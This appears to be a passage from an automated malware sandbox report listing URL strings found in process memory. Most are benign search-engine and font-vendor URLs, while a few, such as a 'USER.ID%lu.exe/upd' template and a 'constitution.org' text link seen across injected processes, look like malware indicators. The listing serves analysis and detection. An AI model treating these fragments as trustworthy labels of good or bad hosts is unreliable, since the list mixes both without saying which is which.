            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: powershell.exe, 00000015.00000003.348574162.0000026779730000.00000004.00000001.sdmpString found in binary or memory: http://cicrosoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: powershell.exe, 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, explorer.exe, 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: powershell.exe, 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, explorer.exe, 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: explorer.exe, 00000023.00000000.375333738.000000000F640000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: powershell.exe, 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, explorer.exe, 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: powershell.exe, 00000015.00000003.310590645.00000267015AF000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: powershell.exe, 00000015.00000003.310300551.00000267013E9000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: powershell.exe, 00000015.00000002.381486406.0000026700001000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 00000023.00000002.488959273.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 00000023.00000002.488959273.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: powershell.exe, 00000015.00000003.309171435.0000026701057000.00000004.00000001.sdmp, explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000015.00000003.310300551.00000267013E9000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
